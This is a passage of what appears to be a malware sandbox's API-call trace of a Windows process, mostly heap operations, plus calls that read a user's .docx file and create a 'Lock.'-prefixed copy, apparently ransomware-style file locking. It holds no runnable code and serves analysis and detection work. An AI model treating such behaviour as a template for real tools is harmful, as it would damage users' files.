hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.011] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0262.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/dKfh5A-JQm_Dx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkfh5a-jqm_dx.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0262.021] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0262.021] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0262.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0262.021] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.021] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.021] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.dKfh5A-JQm_Dx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.dkfh5a-jqm_dx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0262.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0262.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0262.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0262.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0262.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.023] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0262.024] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0262.027] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x8bb1, lpOverlapped=0x0) returned 1 [0262.028] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0262.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18bb1) returned 0x24b7a48 [0262.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0262.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0262.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18bb1) returned 0x24d0608 [0262.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0262.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.033] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0262.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18bb1) returned 0x24b7a48 [0262.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0262.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.034] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0262.034] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.034] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0262.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18bb1) returned 0x24b7a48 [0262.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0262.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18bb1) returned 0x34b2250 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.039] RtlAllocateHeap 